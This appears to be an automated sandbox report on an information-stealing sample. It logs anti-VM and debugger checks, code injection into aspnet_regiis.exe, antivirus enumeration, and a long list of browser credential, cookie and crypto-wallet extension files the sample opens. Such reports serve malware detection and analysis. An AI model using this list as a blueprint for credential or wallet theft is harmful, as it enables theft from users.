            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: Amcache.hve.5.drBinary or memory string: VMware
            Source: Amcache.hve.5.drBinary or memory string: VMware Virtual USB Mouse
            Source: Amcache.hve.5.drBinary or memory string: vmci.syshbin
            Source: Amcache.hve.5.drBinary or memory string: VMware, Inc.
            Source: Amcache.hve.5.drBinary or memory string: VMware20,1hbin@
            Source: Amcache.hve.5.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
            Source: Amcache.hve.5.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
            Source: Amcache.hve.5.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
            Source: aspnet_regiis.exe, aspnet_regiis.exe, 00000002.00000002.2003490990.0000000002C25000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000002.2003490990.0000000002BEC000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1888898483.0000000002C25000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1888898483.0000000002BEC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: Amcache.hve.5.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
            Source: aspnet_regiis.exe, 00000002.00000002.2003490990.0000000002C25000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1888898483.0000000002C25000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW]
            Source: Amcache.hve.5.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
            Source: Amcache.hve.5.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
            Source: Amcache.hve.5.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
            Source: Amcache.hve.5.drBinary or memory string: vmci.sys
            Source: Amcache.hve.5.drBinary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
            Source: Amcache.hve.5.drBinary or memory string: vmci.syshbin`
            Source: Amcache.hve.5.drBinary or memory string: \driver\vmci,\driver\pci
            Source: Amcache.hve.5.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
            Source: Amcache.hve.5.drBinary or memory string: VMware20,1
            Source: Amcache.hve.5.drBinary or memory string: Microsoft Hyper-V Generation Counter
            Source: Amcache.hve.5.drBinary or memory string: NECVMWar VMware SATA CD00
            Source: Amcache.hve.5.drBinary or memory string: VMware Virtual disk SCSI Disk Device
            Source: Amcache.hve.5.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
            Source: Amcache.hve.5.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
            Source: Amcache.hve.5.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
            Source: Amcache.hve.5.drBinary or memory string: VMware PCI VMCI Bus Device
            Source: Amcache.hve.5.drBinary or memory string: VMware VMCI Bus Device
            Source: Amcache.hve.5.drBinary or memory string: VMware Virtual RAM
            Source: Amcache.hve.5.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
            Source: Amcache.hve.5.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CD99D3A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_6CD99D3A
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CD99D09 mov eax, dword ptr fs:[00000030h]0_2_6CD99D09
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CD98B35 mov eax, dword ptr fs:[00000030h]0_2_6CD98B35
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CD9B91C GetProcessHeap,0_2_6CD9B91C
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CD99D3A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_6CD99D3A
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CD96ED1 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_6CD96ED1
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CD973AA IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_6CD973AA
            Source: C:\Users\user\Desktop\file.exeMemory allocated: page read and write | page guardJump to behavior

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Source: C:\Users\user\Desktop\file.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 72AC0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 72AC0000 value starts with: 4D5AJump to behavior
            Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 72AC0000Jump to behavior
            Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 72AC1000Jump to behavior
            Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 72B02000Jump to behavior
            Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 72B05000Jump to behavior
            Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 72B16000Jump to behavior
            Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 72B17000Jump to behavior
            Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 72AC1000Jump to behavior
            Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 72B02000Jump to behavior
            Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 72B05000Jump to behavior
            Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 72B16000Jump to behavior
            Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 72B17000Jump to behavior
            Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 7C5008Jump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe"Jump to behavior
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CD97578 cpuid 0_2_6CD97578
            Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\Desktop\file.exe VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CD96FF3 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_6CD96FF3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
            Source: Amcache.hve.5.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
            Source: Amcache.hve.5.drBinary or memory string: msmpeng.exe
            Source: Amcache.hve.5.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
            Source: aspnet_regiis.exe, aspnet_regiis.exe, 00000002.00000003.1819973696.0000000002C8D000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1823663645.0000000002C8E000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1819973696.0000000002C83000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
            Source: Amcache.hve.5.drBinary or memory string: MsMpEng.exe
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

            Stealing of Sensitive Information

            barindex
            Source: Yara matchFile source: Process Memory Space: aspnet_regiis.exe PID: 2196, type: MEMORYSTR
            Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.jsJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.dbJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqliteJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.dbJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqliteJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.jsonJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqliteJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
